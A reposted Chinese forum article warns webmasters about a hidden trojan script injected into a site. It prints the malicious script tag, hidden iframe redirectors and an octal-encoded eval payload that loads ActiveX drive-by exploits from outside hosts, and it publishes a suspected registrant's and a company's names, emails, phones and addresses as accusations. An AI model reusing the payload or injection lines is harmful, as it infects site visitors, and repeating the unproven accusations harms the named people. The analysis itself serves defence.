站長小心：大家注意這一個掛馬的

2024-04-25 20:20:17

字體：大中小

來源：轉載

供稿：網友

有一個站被掛馬很長時間了，前臺頁面的馬被清掉，但后臺的馬一直找不到，實在不舒服，準備將這個站自殺掉，但又不甘心，決定再找一次。
花了四個多小時，終于找到了，現貼出來提醒大家注意，大家一定不要點馬所在的網址，除非你安裝了殺毒軟件，光一個360是不行的。
先看這一段代碼：
<html xmlns="http://www.w3.org/1999/xhtml">
<script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'></script>
<head>
注意其中的'http://www.w3og.cn/org',這是木馬網頁地址。很有欺騙性，我找過很多次都沒注意到。服務器好象是四川樂山電信的，我幾乎要拿我自己的服務器與之同歸于盡。
再強調一下，貼出來不是要害你啊，不要亂點。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陳強
Registrant Name: 陳強
Administrative Email: zhuya22@126.com
Sponsoring Registrar: 北京新網數碼信息技術有限公司
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02-13 17:16
Expiration Date: 2011-02-13 17:16

http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
電子郵件： zhuya22@126.com
聯系電話： 0577658796549
聯系地址：電風扇士大夫
提交時間： 2006-12-11
主題：這樣的設施也能辦大學？？？
建議內容：溫職院INTERNET網硬件設施太差每棟宿舍樓網速一直以來比撥號
上網還慢，根本不能滿足大學生對TNTER網的需求
交了30元/月的網費卻只能上垃圾網絡，收了我們的血汗錢卻不干人事，氣人兮
氣人，
學校機房既小又差，還1。5元/小時，我靠這也叫大學嗎？？我們學剩
上網只能跑正上的網吧，遠又網費又貴，很多同學為了省錢只能玩通宵
溫職院的網絡設施根本不行，不知道評估團怎么辦事的
可笑的是學校還想評全國十大優秀高職丟死人了

請注意這個公司長沙智之星軟件有限公司www.zzstar.cn,這個木馬一直為這個站帶流量，如果是被陷害的，那還情有可原。如果是同掛馬者合作的話，嚴重鄙視。總經理：廖某某（不貼名字了）
公司地址：長沙市麓山南路343號(礦山研究院內)902室
聯系電話： 0731-2173510 (0)13787116266
郵政編碼： 410012
電子郵箱： zzstar888@126.com zzstar168@163.com
公司網址：www.zzstar.cn www.macrorise.com
業務聯系QQ：7428377 165635301

另一個受害者的文章:今天學生處的人說他們網頁打開就提示有病毒。上去看了一下，果然，打開之后ie有打開其他網頁的動作，瀏覽器很卡，然后跳出一個RealPlayer的窗口，Nod32提示
2008-4-18 16:21:09 HTTP 過濾器文件 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木馬連接中斷 - 已隔離 NIC/Administrator 通過應用程序訪問 web 時檢測到威脅: C:/Program Files/Maxthon2/Maxthon.exe.

于是開始檢查。
費了一番功夫，就不多說了，直接進入主題。

打開Ethereal，對tcp 80端口進行監測，打開Firefox，并清除緩存（如果不清除可能造成不能完全打開）。

完全打開頁面后，關閉監測。進行查看。

按照理論來說，應該只有本機與服務器之間的通信，哪么其他IP地址的通信就很可以了。

果然，看到了61.174.63.178這個IP(www.w3og.cn/org)，使用Ethereal可以看到具體的URL。

使用FF打開這個網頁。
頁面是空白的，查看源代碼內容如下：

www.w3og.cn/org/

document.write("<div style='display:none'>")
document.write("<iframe src=http://abc1.315666.net/s22.html></iframe>")
document.write("<iframe src=http://www.zzstar.cn/reg/w3o.htm></iframe>")
document.write("</div>")

順藤摸瓜：
其中
www.zzstar.cb/reg/w30.htm
<script language="javascript" src="http://count48.51yes.com/click.aspx?id=485576456&logo=1"></script>

是51yes的一個統計。

http://abc1.315666.net/s22.html
<iframe src="news.html" width=100 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1793783.js"></script>

第二個頁面也是統計，第一個頁面就是病毒了。
再次使用FF打開，查看源代碼：

<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("/164/162/171/173/166/141/162/40/145/73/15/12/166/141/162/40/141/144/157/75/50/144/157/143/165/155/145/156/164/56/143/162/145/141/164/145/105/154/145/155/145/156/164/50/42/157/142/152/145/143/164/42/51/51/73/15/12/166/141/162/40/153/141/166/75/42/134/170/64/142/134/170/66/71/134/170/66/145/134/170/66/67/134/170/67/63/134/170/66/146/134/170/66/66/134/170/67/64/42/73/15/12/141/144/157/56/163/145/164/101/164/164/162/151/142/165/164/145/50/42/143/154/141/163/163/151/144/42/54/42/143/154/163/151/144/72/102/104/71/66/103/65/65/66/55/66/65/101/63/55/61/61/104/60/55/71/70/63/101/55/60/60/103/60/64/106/103/62/71/105/63/66/42/51/73/15/12/166/141/162/40/153/141/166/75/42/134/170/64/142/134/170/66/71/134/170/66/145/134/170/66/67/134/170/67/63/134/170/66/146/134/170/66/66/134/170/67/64/42/73/15/12/166/141/162/40/141/163/75/141/144/157/56/143/162/145/141/164/145/157/142/152/145/143/164/50/42/101/144/157/144/142/56/123/164/162/145/141/155/42/54/42/42/51/175/15/12/143/141/164/143/150/50/145/51/173/175/73/15/12/146/151/156/141/154/154/171/173/15/12/151/146/50/145/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/163/143/162/151/160/164/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/134/57/155/163/60/66/60/61/64/56/152/163/76/74/134/57/163/143/162/151/160/164/76/42/51/175/15/12/145/154/163/145/173/15/12/164/162/171/173/40/166/141/162/40/146/73/15/12/166/141/162/40/164/150/165/156/144/145/162/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/104/120/103/154/151/145/156/164/56/126/157/144/42/51/73/175/15/12/143/141/164/143/150/50/146/51/173/175/73/15/12/146/151/156/141/154/154/171/173/40/151/146/50/146/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/124/150/165/156/144/145/162/56/150/164/155/154/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/147/73/15/12/166/141/162/40/147/154/167/157/162/154/144/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/107/114/103/110/101/124/56/107/114/103/150/141/164/103/164/162/154/56/61/42/51/73/175/15/12/143/141/164/143/150/50/147/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/147/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/107/114/127/117/122/114/104/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/150/73/15/12/166/141/162/40/163/164/157/162/155/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/115/120/123/56/123/164/157/162/155/120/154/141/171/145/162/56/61/42/51/73/175/15/12/143/141/164/143/150/50/150/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/150/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/123/164/157/162/155/111/111/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/151/73/15/12/166/141/162/40/162/145/141/154/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/111/105/122/120/103/164/154/56/111/105/122/120/103/164/154/56/61/42/51/73/175/15/12/143/141/164/143/150/50/151/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/151/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/122/145/141/154/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/163/103/162/111/160/124/40/114/101/156/107/165/101/147/105/75/42/152/101/166/101/163/103/162/111/160/124/42/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/134/57/162/145/141/154/56/152/163/76/74/134/57/163/143/162/151/160/164/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/152/73/15/12/166/141/162/40/102/141/151/144/165/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/102/141/151/144/165/102/141/162/56/124/157/157/154/42/51/73/175/15/12/143/141/164/143/150/50/152/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/152/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/102/141/151/144/165/133/42/134/170/64/64/134/170/66/143/134/170/66/146/134/170/66/61/134/170/66/64/134/170/64/64/134/170/65/63/42/135/50/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/102/141/151/144/165/56/143/141/142/42/54/40/42/134/170/64/62/134/170/66/61/134/170/66/71/134/170/66/64/134/170/67/65/134/170/62/145/134/170/66/65/134/170/67/70/134/170/66/65/42/54/40/60/51/175/175/15/12/151/146/50/146/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/147/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/150/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/151/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/152/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/15/12/173/154/157/143/141/164/151/157/156/56/162/145/160/154/141/143/145/50/42/141/142/157/165/164/72/142/154/141/156/153/42/51/73/175/175/175")
/*Extreme*/
</script>

很顯然，這個就是病毒源代碼了。加密了而且，不管他了。
另外注意到，
http://www.51.la/report/0_help.asp?id=1793783&err=4&help=2
可以看到統計名稱。不就是為了一點流量，做這些犯罪的事情，何必呢？

1、使用FF Ethereal。FF不會被這些漏洞利用，而IE基本是一打開就死了。
2、上傳的漏洞位于/xgc/AD/200804/1.js，應該是用的動易的漏洞上傳的。
3、搜索w3og.cn，基本搜索到的網頁，google都會提示是惡意網站...

擁有這個W3og.cn的人的注冊信息：
Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陳強 Registrant Name: 陳強 Administrative Email: zhuya22@126.com Sponsoring Registrar: 北京新網數碼信息技術有限公司 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02-13 17:16 Expiration Date: 2011-02-13 17:16

這個w3og.cn和zzstar(一家建站公司)顯然是有關系的，要不然也不會再木馬里面掛上zzstar的流量統計...